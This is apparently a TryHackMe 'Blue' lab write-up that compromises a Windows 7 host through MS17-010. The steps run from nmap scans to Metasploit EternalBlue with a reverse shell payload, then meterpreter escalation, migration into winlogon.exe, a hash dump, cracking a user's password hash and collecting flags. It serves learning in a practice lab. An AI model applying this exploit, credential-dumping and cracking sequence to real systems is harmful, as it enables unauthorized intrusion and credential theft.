Eternal Blue TryHackMe

performed by: jb-williams

Note- some output will be shortened denoted by “….”

Scanning/Recon

After finding the IP address, I ran my basic nmap recon:

nmap -v -sV -sC -oN initial 10.10.10.13
Bash

Results -

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds
(workgroup: WORKGROUP)
....
....
Bash
  • Came back with these results and noticed ports 138 and 445, which are usually SMB so I ran nmap with specific SMB scripts:

the first one could work but I don’t think my VM could handle it so I did a little research and ran the second cmd

nmap -v --script=smb* -oN scripts 10.10.10.13

nmap -v --script=smb-vuln-ms17-010 -oN smbscript 10.10.10.13
Bash
  • The results of the SMB scan were:
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
....
....

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-
wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Host script results:
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC:-
02:8d:e0:a6:1c:6f (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-23T10:23:28-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-09-23 16:23:28
|_  start_date: 2022-09-23 16:17:45
Bash
  • Found that the vulnerability in SMB was HIGH, and went to Metasploit to find an expoit to attempt.

Gain Access

   -  ----                                      ---------------  ----     -----  ----
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command
Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No      
MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes     
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes     
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code 
Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes     
SMB DOUBLEPULSAR Remote Code Execution
Bash

  • I noticed the scanner module and decided to verify the vulnerability with it, which it confirmed the vulnerability.

  • Then I tried index 2 exploit.

msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > 

set payload windows/x64/shell/reverse_tcp

run
Bash

May have to press ENTER to make the CMD prompt open.

  • Then press CTRL+z to push this shell session to the background.

Escalate

  • Then you can try to escalate the standard shell session to an escalated meterpreter session.

  • Select the shell_to_meterpreter module.

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search shell_to_meterpreter

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Desc.
   -  ----                                  ---------------  ----    -----  --------
   0  post/multi/manage/shell_to_meterpreter                 normal  No     Shell to 
Meterpreter Upgrade
Bash

  • List the modules options with otpions

  • List the available sessions with sessions -l.

  • Set the option to the correct session and run.

  • After it completes sessions -l then sessions -i <ID#> to connect to that session.

  • Verified escalation by checking my user.

meterpreter > shell
Process 1704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
Bash
  • Looking up processes on the machine and found that this one seemed interesting.
C:\Windows\system32>

---   ----  ----                  ----  -------  ----                          ----
 668   608   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           -
C:\Windows\System32\winlogon.exe
Bash
  • Then I migrated to winlogon.exe and was able to dump the password hashes on the system.
meterpreter > migrate -P 668
[*] Migrating from 748 to 668...
[*] Migration completed successfully.
meterpreter > 

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Bash

Cracking

  • Then I took Jon’s password hash ffb43f0de35be4d9917ac0cc8ad57f8d.

  • Used Crackstation.net to crack the hash.

User Password
jon alqfna22
  • Was able to login as Jon then started looking for flags.
meterpreter > search -f flag*.txt
Found 3 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
Bash

Searching for flags

  • Found flag1 by going to root C: drive and ls and catting flag1.txt
flag{access_the_machine}
Bash
  • Found flag2 looking for Windows Sam Config
C:/Windows/System32/config

ls

cat flag2.txt
flag{sam_database_elevated_access}
Bash
  • Found flag3 in Jon’s Documents folder.
meterpreter > cat c:\\Users\\Jon\\Documents\\flag3.txt
flag{admin_documents_can_be_valuable}
Bash

written and performed by jb-williams - github